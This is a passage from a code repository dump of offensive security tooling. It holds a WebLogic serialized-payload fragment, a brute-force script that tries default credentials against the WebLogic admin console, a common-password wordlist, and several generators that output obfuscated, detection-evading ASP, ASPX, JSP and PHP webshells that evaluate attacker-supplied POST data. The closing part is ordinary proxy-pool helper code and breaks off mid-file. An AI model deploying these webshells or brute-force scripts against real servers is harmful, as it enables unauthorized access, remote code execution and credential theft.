'\x00\x00\x05\xf5\x01\x65\x01\xff\xff\xff\xff\xff\xff\xff\xff\x00\x00\x00\x71\x00\x00\xea\x60\x00\x00\x00\x18\x45\x0b\xfc\xbc\xe1\xa6\x4c\x6e\x64\x7e\xc1\x80\xa4\x05\x7c\x87\x3f\x63\x5c\x2d\x49\x1f\x20\x49\x02\x79\x73\x72\x00\x78\x72\x01\x78\x72\x02\x78\x70\x00\x00\x00\x0c\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00\x01\x00\x70\x70\x70\x70\x70\x70\x00\x00\x00\x0c\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00\x01\x00\x70\x06\xfe\x01\x00\x00' 58 | #payload=payload.encode()+payloadObj 59 | 60 | # adjust header for appropriate message length 61 | #payload=struct.pack('>I',len(payload)) + payload[4:] 62 | 63 | #print('[+] Sending payload...') 64 | #sock.send(payload) 65 | #data = sock.recv(1024) 66 | #print('received "%s"' % data) 67 | 68 | 69 | 70 | 71 | 72 | 73 | 74 | 75 | 76 | 77 | 78 | -------------------------------------------------------------------------------- /POC/Weblogic_weakPass.py: -------------------------------------------------------------------------------- 1 | import requests 2 | 3 | 4 | print('[*]Usage: [IP] [7001]') 5 | def check(**kwargs): 6 | url = kwargs['url'] 7 | port = int('80') 8 | """weak password""" 9 | 10 | pwddict = ['WebLogic', 'weblogic', 'Oracle@123', 'password', 'system', 'Administrator', 'admin', 'security', 'joe', 'wlcsystem', 'wlpisystem', 'weblogic123', 'Weblogic123'] 11 | for user in pwddict: 12 | for pwd in pwddict: 13 | data = { 14 | 'j_username':user, 15 | 'j_password':pwd, 16 | 'j_character_encoding':'UTF-8' 17 | } 18 | req = requests.post('http://'+url+':'+str(port)+'/console/j_security_check', data=data, allow_redirects=False, verify=False, timeout=3) 19 | 20 | if req.status_code == 302 and 'console' in req.text and 'LoginForm.jsp' not in req.text: 21 | print('[+] WebLogic username: '+user+' password: '+pwd) 22 | return 1 23 | print('[-]don not have weakPass!') 24 | return 25 | 26 | 27 | 28 | 29 | 30 | 31 | -------------------------------------------------------------------------------- /POC/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ch4O3/CodeTest/3ef65f42db19e72b84107409f5d344286dc7a90d/POC/__init__.py -------------------------------------------------------------------------------- /POC/js_examples/enpassword.js: -------------------------------------------------------------------------------- 1 | /** 2 | *@param username 3 | *@param passwordOrgin 4 | *@return encrypt password for $username who use orign password $passwordOrgin 5 | * 6 | **/ 7 | 8 | function encrypt(username, passwordOrgin) { 9 | return hex_sha1(username+hex_sha1(passwordOrgin)); 10 | } 11 | 12 | 13 | 14 | function hex_sha1(s, hexcase) { 15 | if (!(arguments) || !(arguments.length) || arguments.length < 1) { 16 | return binb2hex(core_sha1(AlignSHA1("aiact@163.com")), true); 17 | } else { 18 | if (arguments.length == 1) { 19 | return binb2hex(core_sha1(AlignSHA1(arguments[0])), true); 20 | } else { 21 | return binb2hex(core_sha1(AlignSHA1(arguments[0])), arguments[1]); 22 | } 23 | } 24 | // return binb2hex(core_sha1(AlignSHA1(s)),hexcase); 25 | } 26 | /**/ 27 | /* 28 | * Perform a simple self-test to see if the VM is working 29 | */ 30 | function sha1_vm_test() { 31 | return hex_sha1("abc",false) == "a9993e364706816aba3e25717850c26c9cd0d89d"; 32 | } 33 | /**/ 34 | /* 35 | * Calculate the SHA-1 of an array of big-endian words, and a bit length 36 | */ 37 | function core_sha1(blockArray) { 38 | var x = blockArray; //append padding 39 | var w = Array(80); 40 | var a = 1732584193; 41 | var b = -271733879; 42 | var c = -1732584194; 43 | var d = 271733878; 44 | var e = -1009589776; 45 | for (var i = 0; i < x.length; i += 16) { //每次处理512位 16*32 46 | var olda = a; 47 | var oldb = b; 48 | var oldc = c; 49 | var oldd = d; 50 | var olde = e; 51 | for (var j = 0; j < 80; j += 1) { //对每个512位进行80步操作 52 | if (j < 16) { 53 | w[j] = x[i + j]; 54 | } else { 55 | w[j] = rol(w[j - 3] ^ w[j - 8] ^ w[j - 14] ^ w[j - 16], 1); 56 | } 57 | var t = safe_add(safe_add(rol(a, 5), sha1_ft(j, b, c, d)), safe_add(safe_add(e, w[j]), sha1_kt(j))); 58 | e = d; 59 | d = c; 60 | c = rol(b, 30); 61 | b = a; 62 | a = t; 63 | } 64 | a = safe_add(a, olda); 65 | b = safe_add(b, oldb); 66 | c = safe_add(c, oldc); 67 | d = safe_add(d, oldd); 68 | e = safe_add(e, olde); 69 | } 70 | return new Array(a, b, c, d, e); 71 | } 72 | /**/ 73 | /* 74 | * Perform the appropriate triplet combination function for the current iteration 75 | * 返回对应F函数的值 76 | */ 77 | function sha1_ft(t, b, c, d) { 78 | if (t < 20) { 79 | return (b & c) | ((~b) & d); 80 | } 81 | if (t < 40) { 82 | return b ^ c ^ d; 83 | } 84 | if (t < 60) { 85 | return (b & c) | (b & d) | (c & d); 86 | } 87 | return b ^ c ^ d; //t<80 88 | } 89 | /**/ 90 | /* 91 | 92 | * Determine the appropriate additive constant for the current iteration 93 | * 返回对应的Kt值 94 | */ 95 | function sha1_kt(t) { 96 | return (t < 20) ? 1518500249 : (t < 40) ? 1859775393 : (t < 60) ? -1894007588 : -899497514; 97 | } 98 | /**/ 99 | /* 100 | * Add integers, wrapping at 2^32. This uses 16-bit operations internally 101 | * to work around bugs in some JS interpreters. 102 | * 将32位数拆成高16位和低16位分别进行相加,从而实现 MOD 2^32 的加法 103 | */ 104 | function safe_add(x, y) { 105 | var lsw = (x & 65535) + (y & 65535); 106 | var msw = (x >> 16) + (y >> 16) + (lsw >> 16); 107 | return (msw << 16) | (lsw & 65535); 108 | } 109 | /**/ 110 | /* 111 | * Bitwise rotate a 32-bit number to the left. 112 | * 32位二进制数循环左移 113 | */ 114 | function rol(num, cnt) { 115 | return (num << cnt) | (num >>> (32 - cnt)); 116 | } 117 | /**/ 118 | /* 119 | 120 | * The standard SHA1 needs the input string to fit into a block 121 | 122 | * This function align the input string to meet the requirement 123 | 124 | */ 125 | function AlignSHA1(str) { 126 | var nblk = ((str.length + 8) >> 6) + 1, blks = new Array(nblk * 16); 127 | for (var i = 0; i < nblk * 16; i += 1) { 128 | blks[i] = 0; 129 | } 130 | for (i = 0; i < str.length; i += 1) { 131 | blks[i >> 2] |= str.charCodeAt(i) << (24 - (i & 3) * 8); 132 | } 133 | blks[i >> 2] |= 128 << (24 - (i & 3) * 8); 134 | blks[nblk * 16 - 1] = str.length * 8; 135 | return blks; 136 | } 137 | /**/ 138 | /* 139 | * Convert an array of big-endian words to a hex string. 140 | */ 141 | function binb2hex(binarray, hexcase) { 142 | var hex_tab = hexcase ? "0123456789ABCDEF" : "0123456789abcdef"; 143 | var str = ""; 144 | for (var i = 0; i < binarray.length * 4; i += 1) { 145 | str += hex_tab.charAt((binarray[i >> 2] >> ((3 - i % 4) * 8 + 4)) & 15) + hex_tab.charAt((binarray[i >> 2] >> ((3 - i % 4) * 8)) & 15); 146 | } 147 | return str; 148 | } 149 | 150 | -------------------------------------------------------------------------------- /POC/js_examples/top100password.txt: -------------------------------------------------------------------------------- 1 | 123456789 2 | a123456 3 | 123456 4 | a123456789 5 | 1234567890 6 | woaini1314 7 | qq123456 8 | abc123456 9 | 123456a 10 | 123456789a 11 | 147258369 12 | zxcvbnm 13 | 987654321 14 | 12345678910 15 | abc123 16 | qq123456789 17 | 123456789. 18 | 7708801314520 19 | woaini 20 | 5201314520 21 | q123456 22 | 123456abc 23 | 1233211234567 24 | 123123123 25 | 123456. 26 | 0123456789 27 | asd123456 28 | aa123456 29 | 135792468 30 | q123456789 31 | abcd123456 32 | 12345678900 33 | woaini520 34 | woaini123 35 | zxcvbnm123 36 | 1111111111111111 37 | w123456 38 | aini1314 39 | abc123456789 40 | 111111 41 | woaini521 42 | qwertyuiop 43 | 1314520520 44 | 1234567891 45 | qwe123456 46 | asd123 47 | 000000 48 | 1472583690 49 | 1357924680 50 | 789456123 51 | 123456789abc 52 | z123456 53 | 1234567899 54 | aaa123456 55 | abcd1234 56 | www123456 57 | 123456789q 58 | 123abc 59 | qwe123 60 | w123456789 61 | 7894561230 62 | 123456qq 63 | zxc123456 64 | 123456789qq 65 | 1111111111 66 | 111111111 67 | 0000000000000000 68 | 1234567891234567 69 | qazwsxedc 70 | qwerty 71 | 123456.. 72 | zxc123 73 | asdfghjkl 74 | 0000000000 75 | 1234554321 76 | 123456q 77 | 123456aa 78 | 9876543210 79 | 110120119 80 | qaz123456 81 | qq5201314 82 | 123698745 83 | 5201314 84 | 000000000 85 | as123456 86 | 123123 87 | 5841314520 88 | z123456789 89 | 52013145201314 90 | a123123 91 | caonima 92 | a5201314 93 | wang123456 94 | abcd123 95 | 123456789.. 96 | woaini1314520 97 | 123456asd 98 | aa123456789 99 | 741852963 100 | a12345678 -------------------------------------------------------------------------------- /POC/webshell_asp.py: -------------------------------------------------------------------------------- 1 | import random 2 | 3 | #author: pureqh 4 | #github: https://github.com/pureqh/webshell 5 | 6 | shell = '''<% 7 | 17 | 18 | %>''' 19 | 20 | 21 | 22 | def random_name(len): 23 | str = 'ABCDEFGHIJKLMNOPQRSTUVWXYZ' 24 | return ''.join(random.sample(str,len)) 25 | 26 | def build_webshell(): 27 | FunctionName = random_name(4) 28 | parameter = random_name(4) 29 | FunctionName1 = random_name(4) 30 | shellc = shell.format(FunctionName,parameter,FunctionName1) 31 | return shellc 32 | 33 | def check(**kwargs): 34 | print (build_webshell()) 35 | 36 | 37 | if __name__ == '__main__': 38 | print (build_webshell()) -------------------------------------------------------------------------------- /POC/webshell_aspx.py: -------------------------------------------------------------------------------- 1 | import random 2 | 3 | #author: pureqh 4 | #github: https://github.com/pureqh/webshell 5 | 6 | shell = '''<%@ Page Language="Jscript" Debug=true%> 7 | <% 8 | var {0}=Request.Form["pureqh"]; 9 | var {1}="unsa",{5}="fe",{4}={1}+{5}; 10 | function {2}() 11 | {6} 12 | return {0}; 13 | {7} 14 | function {3}() 15 | {6} 16 | eval({2}(),{4}); 17 | {7} 18 | {3}() 19 | %>''' 20 | 21 | 22 | 23 | def random_name(len): 24 | str = 'ABCDEFGHIJKLMNOPQRSTUVWXYZ' 25 | return ''.join(random.sample(str,len)) 26 | 27 | def build_webshell(): 28 | parameter = random_name(2) 29 | parameter1 = random_name(3) 30 | FunctionName = random_name(4) 31 | FunctionName1 = random_name(5) 32 | parameter2 = random_name(6) 33 | parameter3 = random_name(7) 34 | lef = '''{''' 35 | rig = '''}''' 36 | shellc = shell.format(parameter,parameter1,FunctionName,FunctionName1,parameter2,parameter3,lef,rig) 37 | return shellc 38 | def check(**kwargs): 39 | print (build_webshell()) 40 | 41 | if __name__ == '__main__': 42 | print (build_webshell()) -------------------------------------------------------------------------------- /POC/webshell_aspx_D.py: -------------------------------------------------------------------------------- 1 | import random 2 | 3 | #author: pureqh 4 | #github: https://github.com/pureqh/webshell 5 | 6 | shell = '''<%@ Page Language="Jscript" Debug=true%> 7 | <% 8 | function {2}() 9 | {6} 10 | var {0}=Request.Form["zero"]; 11 | return {0}; 12 | {7} 13 | function {3}() 14 | {6} 15 | var {1}="unsa",{5}="fe",{4}={1}+{5}; 16 | eval({2}(),{4}); 17 | {7} 18 | {3}() 19 | %>''' 20 | 21 | 22 | 23 | def random_name(len): 24 | str = 'ABCDEFGHIJKLMNOPQRSTUVWXYZ' 25 | return ''.join(random.sample(str,len)) 26 | 27 | def build_webshell(): 28 | parameter = random_name(4) 29 | parameter1 = random_name(4) 30 | FunctionName = random_name(4) 31 | FunctionName1 = random_name(4) 32 | parameter2 = random_name(4) 33 | parameter3 = random_name(4) 34 | lef = '''{''' 35 | rig = '''}''' 36 | shellc = shell.format(parameter,parameter1,FunctionName,FunctionName1,parameter2,parameter3,lef,rig) 37 | return shellc 38 | def check(**kwargs): 39 | print (build_webshell()) 40 | 41 | if __name__ == '__main__': 42 | print (build_webshell()) -------------------------------------------------------------------------------- /POC/webshell_jsp.py: -------------------------------------------------------------------------------- 1 | import random 2 | 3 | #author: pureqh 4 | #github: https://github.com/pureqh/webshell 5 | 6 | shell = '''<%!class {2} extends ClassLoader{0} {2}(ClassLoader {3}){0} super({3}); {1}public Class g(byte []b){0} return super.defineClass(b,0,b.length); {1}{1}%><% String cls=request.getParameter("zero");if(cls!=null){0} new {2}(this.\u0067etClass().\u0067etClassLoader()).g(new sun.misc.{4}{5}{6}{7}{8}{9}{10}{11}{12}{13}{14}{15}{16}().decodeBuffer(cls)).newInstance().equals(pageContext); {1}%> 7 | ''' 8 | 9 | 10 | 11 | def random_name(len): 12 | str = 'ABCDEFGHIJKLMNOPQRSTUVWXYZ' 13 | return ''.join(random.sample(str,len)) 14 | 15 | def build_webshell(): 16 | arr1 = ['\u0042','B'] 17 | arr2 = ['\u0041','A'] 18 | arr3 = ['\u0053','S'] 19 | arr4 = ['\u0045','E'] 20 | arr5 = ['\u0036','6'] 21 | arr6 = ['\u0034','4'] 22 | arr7 = ['\u0044','D'] 23 | arr8 = ['\u0065','e'] 24 | arr9 = ['\u0063','c'] 25 | arr10 = ['\u006f','o'] 26 | arr11 = ['\u0064','d'] 27 | arr12 = ['\u0065','e'] 28 | arr13 = ['\u0072','r'] 29 | 30 | lef = '''{''' 31 | rig = '''}''' 32 | var1 = random_name(4) 33 | var2 = random_name(4) 34 | var3 = random.choice(arr1) 35 | var4 = random.choice(arr2) 36 | var5 = random.choice(arr3) 37 | var6 = random.choice(arr4) 38 | var7 = random.choice(arr5) 39 | var8 = random.choice(arr6) 40 | var9 = random.choice(arr7) 41 | var10 = random.choice(arr8) 42 | var11 = random.choice(arr9) 43 | var12 = random.choice(arr10) 44 | var13 = random.choice(arr11) 45 | var14 = random.choice(arr12) 46 | var15 = random.choice(arr13) 47 | shellc = shell.format(lef,rig,var1,var2,var3,var4,var5,var6,var7,var8,var9,var10,var11,var12,var13,var14,var15) 48 | return shellc 49 | 50 | def check(**kwargs): 51 | print (build_webshell()) 52 | if __name__ == '__main__': 53 | print (build_webshell()) -------------------------------------------------------------------------------- /POC/webshell_php.py: -------------------------------------------------------------------------------- 1 | import random 2 | 3 | #author: pureqh 4 | #github: https://github.com/pureqh/webshell 5 | #use:GET:http://url?pass=pureqh POST:zero 6 | 7 | shell = '''{2} = 'mv3gc3bierpvat2tkrnxuzlsn5ossoy'; 14 | $this->{3} = @{9}($this->{2}); 15 | @eval({5}.$this->{3}.{5}); 16 | {4}{4}{4} 17 | new {0}(); 18 | function {6}(${7}){1} 19 | $BASE32_ALPHABET = 'abcdefghijklmnopqrstuvwxyz234567'; 20 | ${8} = ''; 21 | $v = 0; 22 | $vbits = 0; 23 | for ($i = 0, $j = strlen(${7}); $i < $j; $i++){1} 24 | $v <<= 8; 25 | $v += ord(${7}[$i]); 26 | $vbits += 8; 27 | while ($vbits >= 5) {1} 28 | $vbits -= 5; 29 | ${8} .= $BASE32_ALPHABET[$v >> $vbits]; 30 | $v &= ((1 << $vbits) - 1);{4}{4} 31 | if ($vbits > 0){1} 32 | $v <<= (5 - $vbits); 33 | ${8} .= $BASE32_ALPHABET[$v];{4} 34 | return ${8};{4} 35 | function {9}(${7}){1} 36 | ${8} = ''; 37 | $v = 0; 38 | $vbits = 0; 39 | for ($i = 0, $j = strlen(${7}); $i < $j; $i++){1} 40 | $v <<= 5; 41 | if (${7}[$i] >= 'a' && ${7}[$i] <= 'z'){1} 42 | $v += (ord(${7}[$i]) - 97); 43 | {4} elseif (${7}[$i] >= '2' && ${7}[$i] <= '7') {1} 44 | $v += (24 + ${7}[$i]); 45 | {4} else {1} 46 | exit(1); 47 | {4} 48 | $vbits += 5; 49 | while ($vbits >= 8){1} 50 | $vbits -= 8; 51 | ${8} .= chr($v >> $vbits); 52 | $v &= ((1 << $vbits) - 1);{4}{4} 53 | return ${8};{4} 54 | ?>''' 55 | 56 | 57 | def random_keys(len): 58 | str = '`~-=!@#$%^&_+?<>|:[]abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ' 59 | return ''.join(random.sample(str,len)) 60 | 61 | def random_name(len): 62 | str = 'ABCDEFGHIJKLMNOPQRSTUVWXYZ' 63 | return ''.join(random.sample(str,len)) 64 | 65 | def build_webshell(): 66 | className = random_name(4) 67 | lef = '''{''' 68 | parameter1 = random_name(4) 69 | parameter2 = random_name(4) 70 | rig = '''}''' 71 | disrupt = "\"/*"+random_keys(7)+"*/\"" 72 | fun1 = random_name(4) 73 | fun1_vul = random_name(4) 74 | fun1_ret = random_name(4) 75 | fun2 = random_name(4) 76 | shellc = shell.format(className,lef,parameter1,parameter2,rig,disrupt,fun1,fun1_vul,fun1_ret,fun2) 77 | return shellc 78 | def check(**kwargs): 79 | print (build_webshell()) 80 | 81 | if __name__ == '__main__': 82 | print (build_webshell()) 83 | -------------------------------------------------------------------------------- /POC/webshell_php_D.py: -------------------------------------------------------------------------------- 1 | import random 2 | 3 | #author: pureqh 4 | #github: https://github.com/pureqh/webshell 5 | #use: POST:zero 6 | 7 | shell = '''{2} = 'mv3gc3bierpvat2tkrnxuzlsn5ossoy'; 13 | $this->{3} = @{9}($this->{2}); 14 | @eval({5}.$this->{3}.{5}); 15 | {4}{4} 16 | new {0}(); 17 | function {6}(${7}){1} 18 | $BASE32_ALPHABET = 'abcdefghijklmnopqrstuvwxyz234567'; 19 | ${8} = ''; 20 | $v = 0; 21 | $vbits = 0; 22 | for ($i = 0, $j = strlen(${7}); $i < $j; $i++){1} 23 | $v <<= 8; 24 | $v += ord(${7}[$i]); 25 | $vbits += 8; 26 | while ($vbits >= 5) {1} 27 | $vbits -= 5; 28 | ${8} .= $BASE32_ALPHABET[$v >> $vbits]; 29 | $v &= ((1 << $vbits) - 1);{4}{4} 30 | if ($vbits > 0){1} 31 | $v <<= (5 - $vbits); 32 | ${8} .= $BASE32_ALPHABET[$v];{4} 33 | return ${8};{4} 34 | function {9}(${7}){1} 35 | ${8} = ''; 36 | $v = 0; 37 | $vbits = 0; 38 | for ($i = 0, $j = strlen(${7}); $i < $j; $i++){1} 39 | $v <<= 5; 40 | if (${7}[$i] >= 'a' && ${7}[$i] <= 'z'){1} 41 | $v += (ord(${7}[$i]) - 97); 42 | {4} elseif (${7}[$i] >= '2' && ${7}[$i] <= '7') {1} 43 | $v += (24 + ${7}[$i]); 44 | {4} else {1} 45 | exit(1); 46 | {4} 47 | $vbits += 5; 48 | while ($vbits >= 8){1} 49 | $vbits -= 8; 50 | ${8} .= chr($v >> $vbits); 51 | $v &= ((1 << $vbits) - 1);{4}{4} 52 | return ${8};{4} 53 | ?>''' 54 | 55 | 56 | def random_keys(len): 57 | str = '`~-=!@#$%^&_+?<>|:[]abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ' 58 | return ''.join(random.sample(str,len)) 59 | 60 | def random_name(len): 61 | str = 'ABCDEFGHIJKLMNOPQRSTUVWXYZ' 62 | return ''.join(random.sample(str,len)) 63 | 64 | def build_webshell(): 65 | className = random_name(4) 66 | lef = '''{''' 67 | parameter1 = random_name(4) 68 | parameter2 = random_name(4) 69 | rig = '''}''' 70 | disrupt = "\"/*"+random_keys(7)+"*/\"" 71 | fun1 = random_name(4) 72 | fun1_vul = random_name(4) 73 | fun1_ret = random_name(4) 74 | fun2 = random_name(4) 75 | shellc = shell.format(className,lef,parameter1,parameter2,rig,disrupt,fun1,fun1_vul,fun1_ret,fun2) 76 | return shellc 77 | 78 | def check(**kwargs): 79 | print (build_webshell()) 80 | if __name__ == '__main__': 81 | print (build_webshell()) -------------------------------------------------------------------------------- /POC/模板.py: -------------------------------------------------------------------------------- 1 | inp = b'\xac\xed' 2 | 3 | print(format(int(inp, 16), 'b')) -------------------------------------------------------------------------------- /Proxy/WebRequest.py: -------------------------------------------------------------------------------- 1 | # -*- coding: utf-8 -*- 2 | """ 3 | ------------------------------------------------- 4 | File Name: WebRequest 5 | Description : Network Requests Class 6 | Author : J_hao 7 | date: 2017/7/31 8 | ------------------------------------------------- 9 | Change Activity: 10 | 2017/7/31: 11 | ------------------------------------------------- 12 | """ 13 | __author__ = 'J_hao' 14 | 15 | from requests.models import Response 16 | from lxml import etree 17 | import requests 18 | import random 19 | import time 20 | 21 | from Proxy.handler.logHandler import LogHandler 22 | 23 | requests.packages.urllib3.disable_warnings() 24 | 25 | 26 | class WebRequest(object): 27 | name = "Web_Request" 28 | 29 | def __init__(self, *args, **kwargs): 30 | self.log = LogHandler(self.name, file=False) 31 | self.response = Response() 32 | #self.log = logging.getLogger("web_request") 33 | #self.log.setLevel(logging.DEBUG) 34 | #self.response = Response() 35 | 36 | @property 37 | def user_agent(self): 38 | """ 39 | return an User-Agent at random 40 | :return: 41 | """ 42 | ua_list = [ 43 | 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/30.0.1599.101', 44 | 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.122', 45 | 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71', 46 | 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95', 47 | 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/21.0.1180.71', 48 | 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; QQDownload 732; .NET4.0C; .NET4.0E)', 49 | 'Mozilla/5.0 (Windows NT 5.1; U; en; rv:1.8.1) Gecko/20061208 Firefox/2.0.0 Opera 9.50', 50 | 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:34.0) Gecko/20100101 Firefox/34.0', 51 | ] 52 | return random.choice(ua_list) 53 | 54 | @property 55 | def header(self): 56 | """ 57 | basic header 58 | :return: 59 | """ 60 | return {'User-Agent': self.user_agent, 61 | 'Accept': '*/*', 62 | 'Connection': 'keep-alive', 63 | 'Accept-Language': 'zh-CN,zh;q=0.8'} 64 | 65 | def get(self, url, header=None, retry_time=3, retry_interval=5, timeout=5, *args, **kwargs): 66 | """ 67 | get method 68 | :param url: target url 69 | :param header: headers 70 | :param retry_time: retry time 71 | :param retry_interval: retry interval 72 | :param timeout: network timeout 73 | :return: 74 | """ 75 | headers = self.header 76 | if header and isinstance(header, dict): 77 | headers.update(header) 78 | while True: 79 | try: 80 | self.response = requests.get(url, headers=headers, timeout=timeout, verify=False, *args, **kwargs) 81 | return self 82 | except Exception as e: 83 | self.log.error("requests: %s error: %s" % (url, str(e))) 84 | retry_time -= 1 85 | if retry_time <= 0: 86 | resp = Response() 87 | resp.status_code = 200 88 | return self 89 | self.log.info("retry %s second after" % retry_interval) 90 | time.sleep(retry_interval) 91 | 92 | def respheader(self, key): 93 | try: 94 | return self.response.headers[key] 95 | except Exception as e: 96 | print(str(e)) 97 | return '' 98 | 99 | @property 100 | def code(self): 101 | encodings = requests.utils.get_encodings_from_content(self.response.text) 102 | if encodings: 103 | return encodings[0] 104 | else: 105 | return self.response.apparent_encoding 106 | 107 | @property 108 | def tree(self): 109 | return etree.HTML(self.response.content.decode(self.code, 'ignore')) 110 | 111 | @property 112 | def text(self): 113 | return self.response.text 114 | 115 | @property 116 | def json(self): 117 | try: 118 | return self.response.json() 119 | except Exception as e: 120 | self.log.error(str(e)) 121 | return {} -------------------------------------------------------------------------------- /Proxy/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ch4O3/CodeTest/3ef65f42db19e72b84107409f5d344286dc7a90d/Proxy/__init__.py -------------------------------------------------------------------------------- /Proxy/handler/__init__.py: -------------------------------------------------------------------------------- 1 | # -*- coding: utf-8 -*- 2 | """ 3 | ------------------------------------------------- 4 | File Name: __init__.py 5 | Description : 6 | Author : JHao 7 | date: 2016/12/3 8 | ------------------------------------------------- 9 | Change Activity: 10 | 2016/12/3: 11 | ------------------------------------------------- 12 | """ 13 | __author__ = 'JHao' 14 | 15 | # from handler.ProxyManager import ProxyManager 16 | -------------------------------------------------------------------------------- /Proxy/handler/__pycache__/__init__.cpython-37.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ch4O3/CodeTest/3ef65f42db19e72b84107409f5d344286dc7a90d/Proxy/handler/__pycache__/__init__.cpython-37.pyc -------------------------------------------------------------------------------- /Proxy/handler/__pycache__/configHandler.cpython-37.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ch4O3/CodeTest/3ef65f42db19e72b84107409f5d344286dc7a90d/Proxy/handler/__pycache__/configHandler.cpython-37.pyc -------------------------------------------------------------------------------- /Proxy/handler/__pycache__/logHandler.cpython-37.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ch4O3/CodeTest/3ef65f42db19e72b84107409f5d344286dc7a90d/Proxy/handler/__pycache__/logHandler.cpython-37.pyc -------------------------------------------------------------------------------- /Proxy/handler/__pycache__/proxyHandler.cpython-37.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ch4O3/CodeTest/3ef65f42db19e72b84107409f5d344286dc7a90d/Proxy/handler/__pycache__/proxyHandler.cpython-37.pyc -------------------------------------------------------------------------------- /Proxy/handler/configHandler.py: -------------------------------------------------------------------------------- 1 | # -*- coding: utf-8 -*- 2 | """ 3 | ------------------------------------------------- 4 | File Name: configHandler 5 | Description : 6 | Author : JHao 7 | date: 2020/6/22 8 | ------------------------------------------------- 9 | Change Activity: 10 | 2020/6/22: 11 | ------------------------------------------------- 12 | """ 13 | __author__ = 'JHao' 14 | 15 | import os 16 | import Proxy.proxySetting as setting 17 | from Proxy.util.singleton import Singleton 18 | from Proxy.util.lazyProperty import LazyProperty 19 | from Proxy.util.six import reload_six, withMetaclass 20 | 21 | 22 | class ConfigHandler(withMetaclass(Singleton)): 23 | 24 | def __init__(self): 25 | pass 26 | 27 | #@LazyProperty 28 | #def serverHost(self): 29 | # return os.environ.get("HOST", setting.HOST) 30 | 31 | #@LazyProperty 32 | #def serverPort(self): 33 | # return os.environ.get("PORT", setting.PORT) 34 | 35 | #@LazyProperty 36 | #def dbConn(self): 37 | # return os.getenv("DB_CONN", setting.DB_CONN) 38 | 39 | #@LazyProperty 40 | #def tableName(self): 41 | # return os.getenv("TABLE_NAME", setting.TABLE_NAME) 42 | 43 | #@property 44 | #def fetchers(self): 45 | # reload_six(setting) 46 | # return setting.PROXY_FETCHER 47 | 48 | @LazyProperty 49 | def httpUrl(self): 50 | return os.getenv("HTTP_URL", setting.HTTP_URL) 51 | 52 | @LazyProperty 53 | def httpsUrl(self): 54 | return os.getenv("HTTPS_URL", setting.HTTPS_URL) 55 | 56 | @LazyProperty 57 | def verifyTimeout(self): 58 | return os.getenv("VERIFY_TIMEOUT", setting.VERIFY_TIMEOUT) 59 | 60 | # @LazyProperty 61 | # def proxyCheckCount(self): 62 | # return os.getenv("PROXY_CHECK_COUNT", setting.PROXY_CHECK_COUNT) 63 | 64 | @LazyProperty 65 | def maxFailCount(self): 66 | return os.getenv("MAX_FAIL_COUNT", setting.MAX_FAIL_COUNT) 67 | 68 | # @LazyProperty 69 | # def maxFailRate(self): 70 | # return os.getenv("MAX_FAIL_RATE", setting.MAX_FAIL_RATE) 71 | 72 | @LazyProperty 73 | def poolSizeMin(self): 74 | return os.getenv("POOL_SIZE_MIN", setting.POOL_SIZE_MIN) 75 | 76 | @LazyProperty 77 | def timezone(self): 78 | return os.getenv("TIMEZONE", setting.TIMEZONE) 79 | 80 | -------------------------------------------------------------------------------- /Proxy/handler/logHandler.py: -------------------------------------------------------------------------------- 1 | # -*- coding: utf-8 -*- 2 | """ 3 | ------------------------------------------------- 4 | File Name: LogHandler.py 5 | Description : 日志操作模块 6 | Author : JHao 7 | date: 2017/3/6 8 | ------------------------------------------------- 9 | Change Activity: 10 | 2017/03/06: log handler 11 | 2017/09/21: 屏幕输出/文件输出 可选(默认屏幕和文件均输出) 12 | 2020/07/13: Windows下TimedRotatingFileHandler线程不安全, 不再使用 13 | ------------------------------------------------- 14 | """ 15 | __author__ = 'JHao' 16 | 17 | import os 18 | import logging 19 | import platform 20 | 21 | from logging.handlers import TimedRotatingFileHandler 22 | from logging import FileHandler 23 | 24 | # 日志级别 25 | CRITICAL = 50 26 | FATAL = CRITICAL 27 | ERROR = 40 28 | WARNING = 30 29 | WARN = WARNING 30 | INFO = 20 31 | DEBUG = 10 32 | NOTSET = 0 33 | 34 | CURRENT_PATH = os.path.dirname(os.path.abspath(__file__)) 35 | ROOT_PATH = os.path.join(CURRENT_PATH, os.pardir) 36 | LOG_PATH = os.path.join(ROOT_PATH, 'log') 37 | 38 | if not os.path.exists(LOG_PATH): 39 | try: 40 | os.mkdir(LOG_PATH) 41 | except FileExistsError: 42 | pass 43 | 44 | 45 | class LogHandler(logging.Logger): 46 | """ 47 | LogHandler 48 | """ 49 | 50 | def __init__(self, name, level=DEBUG, stream=False, file=True): 51 | self.name = name 52 | self.level = level 53 | logging.Logger.__init__(self, self.name, level=level) 54 | if stream: 55 | self.__setStreamHandler__() 56 | if file: 57 | if platform.system() == "Windows": 58 | self.__setFileHandler__() 59 | 60 | def __setFileHandler__(self, level=None): 61 | """ 62 | set file handler 63 | :param level: 64 | :return: 65 | """ 66 | file_name = os.path.join(LOG_PATH, '{name}.log'.format(name=self.name)) 67 | # 设置日志回滚, 保存在log目录, 一天保存一个文件, 保留15天 68 | file_handler = TimedRotatingFileHandler(filename=file_name, when='D', interval=1, backupCount=15) 69 | #file_handler = FileHandler(filename=file_name, mode='a', encoding='utf-8') 70 | file_handler.suffix = '%Y%m%d.log' 71 | if not level: 72 | 